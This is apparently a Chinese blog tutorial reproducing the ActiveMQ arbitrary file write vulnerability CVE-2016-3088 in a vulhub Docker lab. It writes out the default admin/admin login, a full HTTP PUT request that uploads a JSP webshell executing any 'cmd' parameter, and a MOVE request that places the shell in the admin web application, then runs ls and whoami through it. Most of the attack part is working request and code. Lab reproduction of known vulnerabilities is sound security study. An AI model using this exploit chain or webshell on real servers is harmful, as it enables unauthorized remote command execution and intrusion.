ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

一.环境配置

腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub

直接来到

启动环境docker-compose,要在root权限下运行。

docker-compose up -d

若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE

访问http://公网ip:8161

若访问成功则环境搭建成功。

二.漏洞复现

目录拼接admin,进行登录操作。默认账户密码为admin/admin。

访问以下目录,找到文件上传的地址。

http://公网ip:8161/admin/test/systemProperties.jsp

随便抓一个页面的包,我这里就抓刚刚查询目录那个页面的包。

写入webshell文件。

将报文转发到Repeater。

进入Repeater中的Header模块,修改报文第一行,并在报文最后添加木马。

返回Repeater中的Raw模块,点击Go发送报文。

PUT /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=rveyn........................
Connection: close

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

上传成功。

访问http://公网ip:8161/fileserver/1.jsp

发现上传成功,但没有解析

ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。

利用MOVE,将木马文件移动到api或者admin,我这边是移动到了admin目录下

还是刚刚的报文,更该第一行和增加第三行。第三行的路径就是最开始查询到的目录。

MOVE /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Destination:file:///opt/activemq/webapps/admin/1.jsp
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=yts9........................
Connection: close
Content-Length: 397

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

访问文件http://公网ip:8161/admin/1.jsp?cmd=ls

执行命令whoami

漏洞复现完成。

相关推荐
softshow10262 天前
Solon 集成 activemq-client
java·activemq·java-activemq
组合缺一2 天前
solon 集成 activemq-client (sdk)
java·solon·activemq
带刺的坐椅4 天前
solon 集成 activemq-client (sdk)
java·solon·activemq
你啊我啊你好6 天前
常用的消息中间件(ActiveMQ、RabbitMQ、RocketMQ、Kafka)面试精华
rabbitmq·rocketmq·activemq
dvlinker1 个月前
大数据技术Kafka详解 ① | 消息队列(Messages Queue)
大数据·kafka·rabbitmq·rocketmq·activemq·分布式发布订阅消息系统·messages queue
想学习java初学者1 个月前
Docker compose部署Activemq
docker·容器·activemq
椰汁菠萝1 个月前
docker运行ActiveMQ-Artemis
docker·容器·activemq
燃犀知不可乎骤得2 个月前
如何在Linux环境中的Qt项目中使用ActiveMQ-CPP
linux·qt·activemq
燃犀知不可乎骤得2 个月前
linux 运行 activemq,Linux 安装 ActiveMQ 服务器详解
linux·activemq
燃犀知不可乎骤得2 个月前
Linux下安装ActiveMQ-CPP
c++·cms·activemq